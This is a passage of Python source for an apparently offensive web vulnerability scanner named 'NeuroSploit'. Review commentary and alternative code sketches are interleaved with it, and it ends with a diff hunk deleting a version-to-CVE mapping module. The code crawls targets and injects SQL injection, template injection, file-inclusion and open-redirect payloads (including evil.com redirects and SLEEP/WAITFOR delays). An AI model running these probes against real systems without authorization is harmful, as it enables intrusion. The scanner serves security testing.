if link not in visited and link not in to_crawl:
to_crawl.append(link)
depth += 1
return list(set(crawled))
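In `_crawl_site`, `depth` is incremented once per batch of up to 20 URLs, so `max_depth` bounds the number of batches, not the link distance from the start page. The sketch below shows a level-by-level alternative in which depth means link distance. It is an illustration under assumptions: `crawl_bfs` and the `fetch_links` callable are hypothetical names, and `fetch_links` stands in for `_extract_links`.

```python
import asyncio
from typing import Awaitable, Callable, List


async def crawl_bfs(
    start: str,
    fetch_links: Callable[[str], Awaitable[List[str]]],
    max_depth: int = 3,
) -> List[str]:
    """Fetch pages level by level and return them in the order they were fetched."""
    visited = {start}
    fetched: List[str] = []
    frontier = [start]

    for _ in range(max_depth):
        if not frontier:
            break
        # Fetch the whole level concurrently; failures come back as exceptions.
        results = await asyncio.gather(
            *(fetch_links(url) for url in frontier), return_exceptions=True
        )
        next_frontier: List[str] = []
        for page, links in zip(frontier, results):
            fetched.append(page)
            if isinstance(links, BaseException):
                continue
            for link in links:
                if link not in visited:
                    visited.add(link)
                    next_frontier.append(link)
        frontier = next_frontier

    return fetched
```

With `max_depth=2` the crawl fetches the start page and the pages it links to directly, and nothing further.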
async def _extract_links(self, url: str, base_domain: str) -> List[str]:
"""Extract links and forms from a page"""
links = []
try:
async with self.session.get(
url,
headers={"User-Agent": "NeuroSploit/3.0"}
) as resp:
body = await resp.text()
# Extract href links
href_pattern = r'href=["\']([^"\']+)["\']'
for match in re.finditer(href_pattern, body, re.IGNORECASE):
link = match.group(1)
full_url = urljoin(url, link)
parsed = urlparse(full_url)
if parsed.netloc == base_domain:
links.append(full_url)
self._add_endpoint(full_url, source="crawler")
# Extract src attributes
src_pattern = r'src=["\']([^"\']+)["\']'
for match in re.finditer(src_pattern, body, re.IGNORECASE):
link = match.group(1)
full_url = urljoin(url, link)
if ".js" in full_url or ".php" in full_url:
self._add_endpoint(full_url, source="crawler")
# Extract form actions
form_pattern = r'<form[^>]*action=["\']([^"\']*)["\'][^>]*>'
for match in re.finditer(form_pattern, body, re.IGNORECASE):
action = match.group(1) or url
full_url = urljoin(url, action)
self._add_endpoint(full_url, source="form")
# Extract URLs from JavaScript
js_url_pattern = r'["\']/(api|v1|v2|user|admin|login|auth)[^"\']*["\']'
for match in re.finditer(js_url_pattern, body):
path = match.group(0).strip("\"'")
full_url = urljoin(url, path)
self._add_endpoint(full_url, source="javascript")
except Exception:
pass
return links
async def _discover_parameters(self, url: str) -> List[str]:
"""Discover parameters through various methods"""
found_params = set()
# Extract from URL
parsed = urlparse(url)
if parsed.query:
params = parse_qs(parsed.query)
found_params.update(params.keys())
# Try common parameters
await self.log("debug", " Testing common parameters...")
base_url = url.split("?")[0]
for param in self.COMMON_PARAMS[:20]: # Test top 20
test_url = f"{base_url}?{param}=test123"
try:
async with self.session.get(
test_url,
headers={"User-Agent": "NeuroSploit/3.0"}
) as resp:
body = await resp.text()
# Treat the parameter as live only when its value is reflected; a bare
# 200 status would mark every parameter on a working page as found
if "test123" in body:
found_params.add(param)
except Exception:
pass
# Try arjun if available
if await self._tool_available("arjun"):
await self.log("debug", " Running arjun parameter discovery...")
try:
process = await asyncio.create_subprocess_exec(
"arjun", "-u", url, "-o", "/tmp/arjun_out.json", "-q",
stdout=asyncio.subprocess.PIPE,
stderr=asyncio.subprocess.PIPE
)
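# communicate() drains the stdout/stderr pipes, so a chatty child cannot block on a full pipe
await asyncio.wait_for(process.communicate(), timeout=60)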
if os.path.exists("/tmp/arjun_out.json"):
with open("/tmp/arjun_out.json", "r") as f:
data = json.load(f)
for url_data in data.values():
if isinstance(url_data, list):
found_params.update(url_data)
os.remove("/tmp/arjun_out.json")
except Exception:
pass
return list(found_params)
def _generate_test_endpoints(
self,
target_url: str,
parameters: List[str],
directories: List[str]
) -> List[Dict]:
"""Generate test endpoints based on discovered information"""
endpoints = []
parsed = urlparse(target_url)
base_url = f"{parsed.scheme}://{parsed.netloc}"
# Generate endpoint + parameter combinations
for directory in directories:
full_url = urljoin(base_url, directory)
endpoints.append({"url": full_url, "source": "directory"})
# Add with common parameters
for param in self.COMMON_PARAMS[:10]:
test_url = f"{full_url}?{param}=FUZZ"
endpoints.append({"url": test_url, "source": "param_injection"})
# Target URL with discovered parameters
for param in parameters:
test_url = f"{target_url.split('?')[0]}?{param}=FUZZ"
endpoints.append({"url": test_url, "source": "discovered_param"})
# Multi-param combinations
if len(parameters) >= 2:
param_string = "&".join([f"{p}=FUZZ" for p in parameters[:5]])
test_url = f"{target_url.split('?')[0]}?{param_string}"
endpoints.append({"url": test_url, "source": "multi_param"})
return endpoints
async def _test_endpoint_all_vulns(self, endpoint: DiscoveredEndpoint) -> List[TestResult]:
"""Test an endpoint for all vulnerability types"""
results = []
url = endpoint.url
# Test XSS
xss_result = await self._test_xss(url)
if xss_result:
results.append(xss_result)
# Test SQLi
sqli_result = await self._test_sqli(url)
if sqli_result:
results.append(sqli_result)
# Test LFI
lfi_result = await self._test_lfi(url)
if lfi_result:
results.append(lfi_result)
# Test Command Injection
cmdi_result = await self._test_cmdi(url)
if cmdi_result:
results.append(cmdi_result)
# Test SSTI
ssti_result = await self._test_ssti(url)
if ssti_result:
results.append(ssti_result)
# Test Open Redirect
redirect_result = await self._test_open_redirect(url)
if redirect_result:
results.append(redirect_result)
return results
async def _inject_payload(self, url: str, payload: str) -> Optional[Dict]:
"""Inject a payload into URL parameters"""
try:
if "?" in url:
base, query = url.split("?", 1)
params = {}
for p in query.split("&"):
if "=" in p:
k, v = p.split("=", 1)
params[k] = payload
else:
params[p] = payload
test_url = base + "?" + urlencode(params)
else:
# Add payload as common parameters, URL-encoded like the branch above
test_url = url + "?" + urlencode({"id": payload, "q": payload})
async with self.session.get(
test_url,
headers={"User-Agent": "NeuroSploit/3.0"},
allow_redirects=False
) as resp:
body = await resp.text()
return {
"url": test_url,
"status": resp.status,
"headers": dict(resp.headers),
"body": body[:5000],
"payload": payload
}
except Exception:
return None
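The query rewriting done by `_inject_payload` can also be expressed with the standard library's query parser, which handles blank values and encoding in one place. This is a minimal sketch, not the module's code: `inject_into_query` and its `default_params` argument are hypothetical names.

```python
from typing import Sequence
from urllib.parse import parse_qsl, urlencode, urlsplit, urlunsplit


def inject_into_query(
    url: str, payload: str, default_params: Sequence[str] = ("id", "q")
) -> str:
    """Return url with every query parameter's value replaced by payload."""
    parts = urlsplit(url)
    # keep_blank_values keeps parameters such as "?debug" or "?q=".
    pairs = parse_qsl(parts.query, keep_blank_values=True)
    if pairs:
        new_pairs = [(name, payload) for name, _ in pairs]
    else:
        # No parameters present: fall back to a couple of common names.
        new_pairs = [(name, payload) for name in default_params]
    # urlencode percent-encodes the payload so the URL stays well-formed.
    return urlunsplit(parts._replace(query=urlencode(new_pairs)))
```

Encoding both branches the same way means a payload containing `&` or `#` is sent as one parameter value and does not split the query string.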
async def _test_xss(self, url: str) -> Optional[TestResult]:
"""Test for XSS vulnerabilities"""
for payload in self.XSS_PAYLOADS:
result = await self._inject_payload(url, payload)
if not result:
continue
# Check if payload is reflected
if payload in result["body"]:
return TestResult(
endpoint=url,
vuln_type="xss_reflected",
payload=payload,
is_vulnerable=True,
confidence=0.8,
evidence=f"Payload reflected in response: {payload}",
request={"url": result["url"], "method": "GET"},
response={"status": result["status"], "body_preview": result["body"][:500]}
)
# Check for unescaped reflection
if payload.replace("<", "&lt;").replace(">", "&gt;") not in result["body"]:
if any(tag in result["body"] for tag in ["<script", "<img", "<svg", "onerror", "onload"]):
return TestResult(
endpoint=url,
vuln_type="xss_reflected",
payload=payload,
is_vulnerable=True,
confidence=0.6,
evidence="HTML tags detected in response",
request={"url": result["url"], "method": "GET"},
response={"status": result["status"], "body_preview": result["body"][:500]}
)
return None
async def _test_sqli(self, url: str) -> Optional[TestResult]:
"""Test for SQL injection vulnerabilities"""
error_patterns = [
"sql syntax", "mysql", "sqlite", "postgresql", "oracle",
"syntax error", "unclosed quotation", "unterminated string",
"query failed", "database error", "odbc", "jdbc",
"microsoft sql", "pg_query", "mysql_fetch", "ora-",
"quoted string not properly terminated"
]
for payload in self.SQLI_PAYLOADS:
result = await self._inject_payload(url, payload)
if not result:
continue
body_lower = result["body"].lower()
# Check for SQL error messages
for pattern in error_patterns:
if pattern in body_lower:
return TestResult(
endpoint=url,
vuln_type="sqli_error",
payload=payload,
is_vulnerable=True,
confidence=0.9,
evidence=f"SQL error pattern found: {pattern}",
request={"url": result["url"], "method": "GET"},
response={"status": result["status"], "body_preview": result["body"][:500]}
)
# Test for time-based blind SQLi
import time  # hoisted out of the loop; ideally a module-level import
time_payloads = ["1' AND SLEEP(5)--", "1'; WAITFOR DELAY '0:0:5'--"]
for payload in time_payloads:
start = time.time()
result = await self._inject_payload(url, payload)
elapsed = time.time() - start
if elapsed >= 4.5: # Account for network latency
return TestResult(
endpoint=url,
vuln_type="sqli_blind_time",
payload=payload,
is_vulnerable=True,
confidence=0.7,
evidence=f"Response delayed by {elapsed:.1f}s (expected 5s)",
request={"url": url, "method": "GET"},
response={"status": 0, "body_preview": "TIMEOUT"}
)
return None
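The time-based check above compares the raw elapsed time against 4.5 seconds, so an endpoint that is slow for unrelated reasons would also trip it. One possible refinement, sketched here as an assumption and not taken from the module, is to measure a baseline request first and compare the difference. `delay_is_suspicious` and its parameters are hypothetical names.

```python
def delay_is_suspicious(
    baseline_s: float,
    injected_s: float,
    sleep_s: float = 5.0,
    tolerance_s: float = 0.5,
) -> bool:
    """Return True when the injected request was slower than the baseline
    by roughly the delay the payload asked the database to sleep for."""
    return (injected_s - baseline_s) >= (sleep_s - tolerance_s)
```

A caller would time one request without the payload, one with it, and pass both durations in; repeating the pair a few times reduces noise from network jitter.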
async def _test_lfi(self, url: str) -> Optional[TestResult]:
"""Test for Local File Inclusion vulnerabilities"""
lfi_indicators = [
"root:x:", "root:*:", "[boot loader]", "[operating systems]",
"bin/bash", "/bin/sh", "daemon:", "www-data:",
"[extensions]", "[fonts]", "extension=",
]
for payload in self.LFI_PAYLOADS:
result = await self._inject_payload(url, payload)
if not result:
continue
body_lower = result["body"].lower()
for indicator in lfi_indicators:
if indicator.lower() in body_lower:
return TestResult(
endpoint=url,
vuln_type="lfi",
payload=payload,
is_vulnerable=True,
confidence=0.95,
evidence=f"File content indicator found: {indicator}",
request={"url": result["url"], "method": "GET"},
response={"status": result["status"], "body_preview": result["body"][:500]}
)
return None
async def _test_cmdi(self, url: str) -> Optional[TestResult]:
"""Test for Command Injection vulnerabilities"""
cmdi_indicators = [
"uid=", "gid=", "groups=", "root:x:",
"linux", "darwin", "bin/", "/usr/",
"volume serial number", "directory of",
]
for payload in self.CMDI_PAYLOADS:
result = await self._inject_payload(url, payload)
if not result:
continue
body_lower = result["body"].lower()
for indicator in cmdi_indicators:
if indicator.lower() in body_lower:
return TestResult(
endpoint=url,
vuln_type="command_injection",
payload=payload,
is_vulnerable=True,
confidence=0.9,
evidence=f"Command output indicator found: {indicator}",
request={"url": result["url"], "method": "GET"},
response={"status": result["status"], "body_preview": result["body"][:500]}
)
return None
async def _test_ssti(self, url: str) -> Optional[TestResult]:
"""Test for Server-Side Template Injection"""
# Mathematical expressions that should evaluate
math_payloads = [
("{{7*7}}", "49"),
("${7*7}", "49"),
("<%= 7*7 %>", "49"),
("{{7*'7'}}", "7777777"),
("#{7*7}", "49"),
]
for payload, expected in math_payloads:
result = await self._inject_payload(url, payload)
if not result:
continue
if expected in result["body"] and payload not in result["body"]:
return TestResult(
endpoint=url,
vuln_type="ssti",
payload=payload,
is_vulnerable=True,
confidence=0.85,
evidence=f"Template expression evaluated: {payload} -> {expected}",
request={"url": result["url"], "method": "GET"},
response={"status": result["status"], "body_preview": result["body"][:500]}
)
return None
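The SSTI check above reports a finding when the expected result (for example `49`) appears in the body and the raw payload does not. A page that already contains `49` would satisfy that without any template evaluation. The sketch below adds a baseline comparison as one way to reduce such false positives; it is an assumption layered on the original logic, and `ssti_evaluated` is a hypothetical name.

```python
def ssti_evaluated(baseline_body: str, test_body: str, payload: str, expected: str) -> bool:
    """Return True when the evaluated result shows up only after injection."""
    if payload in test_body:
        # The expression was echoed back verbatim, so it was not evaluated.
        return False
    if expected not in test_body:
        return False
    # Require more occurrences than the page has without the payload.
    return test_body.count(expected) > baseline_body.count(expected)
```

Here `baseline_body` is the response to the same URL with a harmless parameter value, fetched before the payloads are sent.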
async def _test_open_redirect(self, url: str) -> Optional[TestResult]:
"""Test for Open Redirect vulnerabilities"""
redirect_payloads = [
"https://evil.com",
"//evil.com",
"////evil.com",
"https:evil.com",
"/\\evil.com",
"///evil.com/%2f..",
]
redirect_params = ["url", "redirect", "next", "return", "goto", "dest", "rurl", "target"]
parsed = urlparse(url)
base_url = f"{parsed.scheme}://{parsed.netloc}{parsed.path}"
for param in redirect_params:
for payload in redirect_payloads:
test_url = f"{base_url}?{param}={payload}"
try:
async with self.session.get(
test_url,
headers={"User-Agent": "NeuroSploit/3.0"},
allow_redirects=False
) as resp:
if resp.status in [301, 302, 303, 307, 308]:
location = resp.headers.get("Location", "")
if "evil.com" in location:
return TestResult(
endpoint=url,
vuln_type="open_redirect",
payload=payload,
is_vulnerable=True,
confidence=0.85,
evidence=f"Redirects to external domain: {location}",
request={"url": test_url, "method": "GET"},
response={"status": resp.status, "location": location}
)
except Exception:
pass
return None
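The redirect test above flags any `Location` header that contains the substring `evil.com`, which also matches same-site redirects that merely carry the payload in their query string. A stricter comparison parses the header and compares hosts. This is a minimal sketch under assumptions: `redirects_off_site` is a hypothetical helper, and it does not model browser quirks such as treating `/\evil.com` as a protocol-relative URL.

```python
from urllib.parse import urlparse


def redirects_off_site(location: str, origin_url: str) -> bool:
    """Return True when a Location header points at a different host."""
    origin_host = urlparse(origin_url).hostname
    target_host = urlparse(location).hostname
    # Relative redirects have no host and therefore stay on the origin.
    return target_host is not None and target_host != origin_host
```

`urlparse` lowercases `hostname`, so the comparison is case-insensitive, and protocol-relative values such as `//evil.com` are parsed with `evil.com` as the host.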
@@ -1,686 +0,0 @@
"""
Banner / version-to-vulnerability mapping module.
Analyses software version strings extracted during reconnaissance and maps
them to known CVEs, end-of-life status, and security advisories. Every CVE
entry in KNOWN_VULNS references a real, publicly-documented vulnerability.
"""
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple
# ---------------------------------------------------------------------------
# Data classes
# ---------------------------------------------------------------------------
@dataclass
class BannerFinding:
"""A single vulnerability or advisory derived from a version string."""
software: str
version: str
cve: str
vuln_type: str
severity: str # critical | high | medium | low
description: str
source: str # e.g. "banner_analyzer:known_vulns"
# ---------------------------------------------------------------------------
# Severity ordering (lower index == more severe)
# ---------------------------------------------------------------------------
_SEVERITY_ORDER = {"critical": 0, "high": 1, "medium": 2, "low": 3}
# ---------------------------------------------------------------------------
# BannerAnalyzer
# ---------------------------------------------------------------------------
class BannerAnalyzer:
"""Map detected software versions to known vulnerabilities."""
# Each key is "software/version" (lowercase). Prefix matching is also
# attempted, so a detected "apache/2.4.49.1" matches the "apache/2.4.49" entry.
KNOWN_VULNS: Dict[str, Dict] = {
# ---- Apache HTTPD ------------------------------------------------
"apache/2.4.49": {
"cve": "CVE-2021-41773",
"type": "path_traversal",
"severity": "critical",
"description": "Path traversal and file disclosure via crafted URI in Apache 2.4.49.",
},
"apache/2.4.50": {
"cve": "CVE-2021-42013",
"type": "rce",
"severity": "critical",
"description": "Remote code execution via path traversal bypass in Apache 2.4.50 (incomplete fix for CVE-2021-41773).",
},
"apache/2.4.51": {
"cve": "CVE-2021-44790",
"type": "buffer_overflow",
"severity": "critical",
"description": "Buffer overflow in mod_lua multipart parser in Apache <= 2.4.51.",
},
"apache/2.4.48": {
"cve": "CVE-2021-33193",
"type": "http_request_smuggling",
"severity": "high",
"description": "HTTP/2 request smuggling via crafted method in Apache 2.4.48.",
},
"apache/2.4.46": {
"cve": "CVE-2020-35452",
"type": "stack_overflow",
"severity": "high",
"description": "Stack overflow via crafted Digest nonce in mod_auth_digest (Apache <= 2.4.46).",
},
"apache/2.4.43": {
"cve": "CVE-2020-9490",
"type": "dos",
"severity": "high",
"description": "Push Diary crash via crafted Cache-Digest header in Apache 2.4.43.",
},
"apache/2.4.41": {
"cve": "CVE-2020-1927",
"type": "open_redirect",
"severity": "medium",
"description": "Open redirect in mod_rewrite when the URL starts with multiple slashes.",
},
"apache/2.4.39": {
"cve": "CVE-2019-10098",
"type": "open_redirect",
"severity": "medium",
"description": "mod_rewrite self-referential redirect causing open redirect.",
},
# ---- Nginx -------------------------------------------------------
"nginx/1.17.9": {
"cve": "CVE-2021-23017",
"type": "dns_resolver_rce",
"severity": "critical",
"description": "Off-by-one error in nginx DNS resolver allows RCE via crafted DNS response.",
},
"nginx/1.18.0": {
"cve": "CVE-2021-23017",
"type": "dns_resolver_rce",
"severity": "critical",
"description": "Nginx <= 1.20.0 DNS resolver off-by-one heap write (requires resolver directive).",
},
"nginx/1.14.0": {
"cve": "CVE-2019-9511",
"type": "dos",
"severity": "high",
"description": "HTTP/2 Data Dribble DoS in nginx < 1.16.1 / 1.17.3.",
},
"nginx/1.16.0": {
"cve": "CVE-2019-9513",
"type": "dos",
"severity": "high",
"description": "HTTP/2 Resource Loop DoS in nginx < 1.16.1 / 1.17.3.",
},
"nginx/1.13.2": {
"cve": "CVE-2017-7529",
"type": "information_disclosure",
"severity": "medium",
"description": "Integer overflow in range filter allows memory disclosure in nginx < 1.13.3.",
},
# ---- PHP ---------------------------------------------------------
"php/7.4.21": {
"cve": "CVE-2021-21706",
"type": "path_traversal",
"severity": "medium",
"description": "ZipArchive::extractTo path traversal on Windows in PHP < 7.4.27.",
},
"php/7.4.29": {
"cve": "CVE-2022-31625",
"type": "use_after_free",
"severity": "critical",
"description": "Use-after-free in pg_query_params() in PHP < 7.4.30.",
},
"php/8.0.0": {
"cve": "CVE-2021-21702",
"type": "dos",
"severity": "high",
"description": "Null pointer dereference in SoapClient in PHP 8.0.0.",
},
"php/8.0.12": {
"cve": "CVE-2021-21707",
"type": "information_disclosure",
"severity": "medium",
"description": "URL validation bypass via null bytes in PHP < 8.0.14.",
},
"php/8.1.0": {
"cve": "CVE-2022-31626",
"type": "buffer_overflow",
"severity": "critical",
"description": "Buffer overflow in mysqlnd/pdo_mysql password handling in PHP < 8.1.8.",
},
"php/8.1.2": {
"cve": "CVE-2022-31628",
"type": "dos",
"severity": "medium",
"description": "phar archive infinite loop denial-of-service in PHP < 8.1.10.",
},
"php/8.1.12": {
"cve": "CVE-2022-37454",
"type": "buffer_overflow",
"severity": "critical",
"description": "SHA-3 buffer overflow (XKCP) in PHP < 8.1.13.",
},
"php/7.4.3": {
"cve": "CVE-2020-7068",
"type": "use_after_free",
"severity": "high",
"description": "Use-after-free in PHAR parsing in PHP < 7.4.10.",
},
# ---- WordPress ---------------------------------------------------
"wordpress/5.6": {
"cve": "CVE-2021-29447",
"type": "xxe",
"severity": "high",
"description": "XXE via media file upload (iXML) in WordPress 5.6-5.7.",
},
"wordpress/5.7": {
"cve": "CVE-2021-29447",
"type": "xxe",
"severity": "high",
"description": "XXE via media file upload (iXML) in WordPress 5.6-5.7.",
},
"wordpress/5.0": {
"cve": "CVE-2019-8942",
"type": "rce",
"severity": "critical",
"description": "Authenticated RCE via crafted post meta in WordPress < 5.0.1.",
},
"wordpress/5.4": {
"cve": "CVE-2020-28032",
"type": "object_injection",
"severity": "critical",
"description": "PHP Object Injection via SimpleXML deserialization in WordPress < 5.5.2.",
},
"wordpress/6.0": {
"cve": "CVE-2022-43504",
"type": "csrf",
"severity": "medium",
"description": "CSRF token verification bypass in WordPress < 6.0.3.",
},
"wordpress/6.1": {
"cve": "CVE-2022-3590",
"type": "ssrf",
"severity": "medium",
"description": "Unauthenticated blind SSRF via DNS rebinding in the pingback feature (TOCTOU between validation and request).",
},
"wordpress/6.2": {
"cve": "CVE-2023-38000",
"type": "xss",
"severity": "medium",
"description": "Stored XSS via block editor in WordPress < 6.3.2.",
},
# ---- jQuery ------------------------------------------------------
"jquery/1.12.4": {
"cve": "CVE-2020-11022",
"type": "xss",
"severity": "medium",
"description": "XSS via passing HTML from untrusted source to jQuery DOM manipulation in jQuery < 3.5.0.",
},
"jquery/2.2.4": {
"cve": "CVE-2020-11022",
"type": "xss",
"severity": "medium",
"description": "XSS via passing HTML from untrusted source to jQuery DOM manipulation in jQuery < 3.5.0.",
},
"jquery/3.4.1": {
"cve": "CVE-2020-11022",
"type": "xss",
"severity": "medium",
"description": "XSS in htmlPrefilter regex in jQuery < 3.5.0.",
},
"jquery/3.5.0": {
"cve": "CVE-2020-11023",
"type": "xss",
"severity": "medium",
"description": "XSS when passing <option> HTML to jQuery DOM manipulation methods in jQuery < 3.5.1.",
},
# ---- Spring Framework --------------------------------------------
"spring/4.3.0": {
"cve": "CVE-2022-22965",
"type": "rce",
"severity": "critical",
"description": "Spring4Shell: RCE via data binding to ClassLoader in Spring Framework < 5.3.18.",
},
"spring/5.2.0": {
"cve": "CVE-2022-22965",
"type": "rce",
"severity": "critical",
"description": "Spring4Shell: RCE via data binding to ClassLoader in Spring Framework < 5.3.18.",
},
"spring/5.3.0": {
"cve": "CVE-2022-22965",
"type": "rce",
"severity": "critical",
"description": "Spring4Shell: RCE via class loader manipulation on JDK 9+ (Spring < 5.3.18).",
},
"spring/5.3.17": {
"cve": "CVE-2022-22965",
"type": "rce",
"severity": "critical",
"description": "Spring4Shell: RCE via class loader manipulation on JDK 9+ (Spring < 5.3.18).",
},
# ---- Log4j -------------------------------------------------------
"log4j/2.0": {
"cve": "CVE-2021-44228",
"type": "rce",
"severity": "critical",
"description": "Log4Shell: RCE via JNDI lookup injection in Log4j 2.0-2.14.1.",
},
"log4j/2.14.1": {
"cve": "CVE-2021-44228",
"type": "rce",
"severity": "critical",
"description": "Log4Shell: RCE via JNDI lookup injection in Log4j 2.0-2.14.1.",
},
"log4j/2.15.0": {
"cve": "CVE-2021-45046",
"type": "rce",
"severity": "critical",
"description": "Incomplete fix for Log4Shell; RCE still possible via Thread Context Map in Log4j 2.15.0.",
},
"log4j/2.16.0": {
"cve": "CVE-2021-45105",
"type": "dos",
"severity": "high",
"description": "DoS via uncontrolled recursion in lookup evaluation in Log4j 2.16.0.",
},
# ---- Apache Tomcat -----------------------------------------------
"tomcat/9.0.0": {
"cve": "CVE-2020-1938",
"type": "file_read",
"severity": "critical",
"description": "Ghostcat: AJP file read/inclusion via default AJP connector in Tomcat < 9.0.31.",
},
"tomcat/8.5.0": {
"cve": "CVE-2020-1938",
"type": "file_read",
"severity": "critical",
"description": "Ghostcat: AJP file read/inclusion via default AJP connector in Tomcat < 8.5.51.",
},
"tomcat/9.0.30": {
"cve": "CVE-2020-1938",
"type": "file_read",
"severity": "critical",
"description": "Ghostcat: AJP file read/inclusion via default AJP connector in Tomcat < 9.0.31.",
},
"tomcat/10.0.0": {
"cve": "CVE-2021-25329",
"type": "rce",
"severity": "high",
"description": "RCE via session persistence deserialization in Tomcat 10.0.0-M1 to 10.0.0.",
},
"tomcat/9.0.43": {
"cve": "CVE-2021-25122",
"type": "information_disclosure",
"severity": "high",
"description": "HTTP/2 request mix-up: responses sent to wrong client in Tomcat < 9.0.44.",
},
"tomcat/8.5.50": {
"cve": "CVE-2020-9484",
"type": "rce",
"severity": "high",
"description": "Deserialization RCE via FileStore session persistence in Tomcat < 8.5.55.",
},
# ---- OpenSSL -----------------------------------------------------
"openssl/1.0.1": {
"cve": "CVE-2014-0160",
"type": "information_disclosure",
"severity": "critical",
"description": "Heartbleed: memory disclosure via TLS heartbeat extension in OpenSSL 1.0.1-1.0.1f.",
},
"openssl/1.0.2": {
"cve": "CVE-2016-2107",
"type": "padding_oracle",
"severity": "high",
"description": "AES-NI CBC MAC check padding oracle in OpenSSL 1.0.2 before 1.0.2h.",
},
"openssl/1.1.0": {
"cve": "CVE-2017-3735",
"type": "buffer_overread",
"severity": "medium",
"description": "One-byte buffer overread parsing IPAddressFamily in OpenSSL < 1.1.0g.",
},
"openssl/1.1.1": {
"cve": "CVE-2020-1971",
"type": "dos",
"severity": "high",
"description": "Null pointer dereference in GENERAL_NAME_cmp (X.400) in OpenSSL < 1.1.1i.",
},
"openssl/3.0.0": {
"cve": "CVE-2022-3602",
"type": "buffer_overflow",
"severity": "high",
"description": "X.509 email address 4-byte buffer overflow in OpenSSL 3.0.0-3.0.6.",
},
"openssl/3.0.6": {
"cve": "CVE-2022-3786",
"type": "buffer_overflow",
"severity": "high",
"description": "X.509 email address variable-length buffer overflow in OpenSSL 3.0.0-3.0.6.",
},
# ---- Node.js -----------------------------------------------------
"node/14.0.0": {
"cve": "CVE-2021-22930",
"type": "use_after_free",
"severity": "critical",
"description": "Use-after-free on close http2 on stream canceling in Node.js < 14.17.5.",
},
"node/16.0.0": {
"cve": "CVE-2021-22931",
"type": "rce",
"severity": "critical",
"description": "Improper handling of untypical characters in domain names allowing RCE in Node.js < 16.6.2.",
},
"node/16.13.0": {
"cve": "CVE-2022-21824",
"type": "prototype_pollution",
"severity": "medium",
"description": "Prototype pollution via console.table in Node.js < 16.13.2.",
},
"node/18.0.0": {
"cve": "CVE-2022-32215",
"type": "http_request_smuggling",
"severity": "high",
"description": "HTTP request smuggling due to incorrect Transfer-Encoding parsing in Node.js < 18.5.0.",
},
"node/18.12.0": {
"cve": "CVE-2023-23918",
"type": "privilege_escalation",
"severity": "high",
"description": "Permissions policy bypass via process.mainModule in Node.js < 18.14.1.",
},
# ---- Django ------------------------------------------------------
"django/2.2": {
"cve": "CVE-2021-35042",
"type": "sqli",
"severity": "critical",
"description": "SQL injection via untrusted data in QuerySet.order_by() in Django < 2.2.25.",
},
"django/3.0": {
"cve": "CVE-2020-9402",
"type": "sqli",
"severity": "high",
"description": "SQL injection via crafted tolerance parameter in GIS functions (Django < 3.0.4).",
},
"django/3.1": {
"cve": "CVE-2021-33571",
"type": "header_injection",
"severity": "medium",
"description": "URLValidator allows leading/trailing whitespace, enabling header injection (Django < 3.1.13).",
},
"django/3.2": {
"cve": "CVE-2021-45115",
"type": "dos",
"severity": "high",
"description": "DoS via UserAttributeSimilarityValidator with a large password (Django < 3.2.11).",
},
"django/4.0": {
"cve": "CVE-2022-28346",
"type": "sqli",
"severity": "critical",
"description": "SQL injection via crafted column aliases in QuerySet.annotate()/aggregate() (Django < 4.0.4).",
},
"django/4.1": {
"cve": "CVE-2023-23969",
"type": "dos",
"severity": "high",
"description": "DoS via large Accept-Language header in Django < 4.1.6.",
},
# ---- Laravel -----------------------------------------------------
"laravel/8.0": {
"cve": "CVE-2021-3129",
"type": "rce",
"severity": "critical",
"description": "RCE via Ignition debug mode file manipulation in Laravel/Ignition < 2.5.2.",
},
"laravel/9.0": {
"cve": "CVE-2022-40482",
"type": "information_disclosure",
"severity": "medium",
"description": "Route parameter exposure via debug error pages in Laravel < 9.32.0.",
},
"laravel/7.0": {
"cve": "CVE-2021-3129",
"type": "rce",
"severity": "critical",
"description": "RCE via Ignition debug mode (phar deserialization) in Laravel/Ignition <= 2.5.1.",
},
# ---- Ruby on Rails -----------------------------------------------
"rails/5.2.0": {
"cve": "CVE-2019-5418",
"type": "file_read",
"severity": "critical",
"description": "File content disclosure via Action View render with Accept header manipulation.",
},
"rails/6.0.0": {
"cve": "CVE-2020-8163",
"type": "rce",
"severity": "critical",
"description": "RCE via code injection in Action Pack in Rails < 6.0.3.1.",
},
"rails/6.1.0": {
"cve": "CVE-2021-22885",
"type": "information_disclosure",
"severity": "high",
"description": "Possible information disclosure via unintended method execution in Action Pack.",
},
"rails/7.0.0": {
"cve": "CVE-2022-32224",
"type": "rce",
"severity": "critical",
"description": "Possible RCE via serialized columns in Active Record (Rails < 7.0.3.1).",
},
"rails/6.0.3": {
"cve": "CVE-2021-22904",
"type": "dos",
"severity": "high",
"description": "DoS via crafted Accept header in Action Controller (Rails < 6.0.3.7).",
},
# ---- Express.js --------------------------------------------------
"express/4.17.0": {
"cve": "CVE-2022-24999",
"type": "prototype_pollution",
"severity": "high",
"description": "Prototype pollution via qs library (< 6.10.3) used in Express < 4.17.3.",
},
"express/4.16.0": {
"cve": "CVE-2022-24999",
"type": "prototype_pollution",
"severity": "high",
"description": "Prototype pollution via qs library in Express < 4.17.3.",
},
"express/4.6.0": {
"cve": "CVE-2014-6393",
"type": "xss",
"severity": "medium",
"description": "XSS via missing Content-Type in Express < 4.11.0.",
},
# ---- IIS ---------------------------------------------------------
"iis/10.0": {
"cve": "CVE-2021-31166",
"type": "rce",
"severity": "critical",
"description": "HTTP protocol stack RCE (wormable) in IIS on Windows 10 / Server (KB5003173).",
},
"iis/6.0": {
"cve": "CVE-2017-7269",
"type": "buffer_overflow",
"severity": "critical",
"description": "Buffer overflow in the WebDAV service (ScStoragePathFromUrl) in IIS 6.0 allows RCE.",
},
# ---- Drupal ------------------------------------------------------
"drupal/7.0": {
"cve": "CVE-2018-7600",
"type": "rce",
"severity": "critical",
"description": "Drupalgeddon2: RCE via Form API render array injection in Drupal 7.x < 7.58.",
},
"drupal/8.0": {
"cve": "CVE-2019-6340",
"type": "rce",
"severity": "critical",
"description": "RCE via REST module deserialization in Drupal 8.5.x < 8.5.11 / 8.6.x < 8.6.10.",
},
# ---- Joomla ------------------------------------------------------
"joomla/4.0.0": {
"cve": "CVE-2023-23752",
"type": "information_disclosure",
"severity": "high",
"description": "Unauthenticated information disclosure via Rest API in Joomla 4.0.0-4.2.7.",
},
# ---- Elasticsearch -----------------------------------------------
"elasticsearch/1.2.0": {
"cve": "CVE-2014-3120",
"type": "rce",
"severity": "critical",
"description": "RCE via MVEL scripting engine enabled by default in Elasticsearch < 1.2.1.",
},
}
# End-of-life version prefixes: any detected version starting with one of
# these is considered unsupported and should be flagged.
EOL_VERSIONS: Dict[str, List[str]] = {
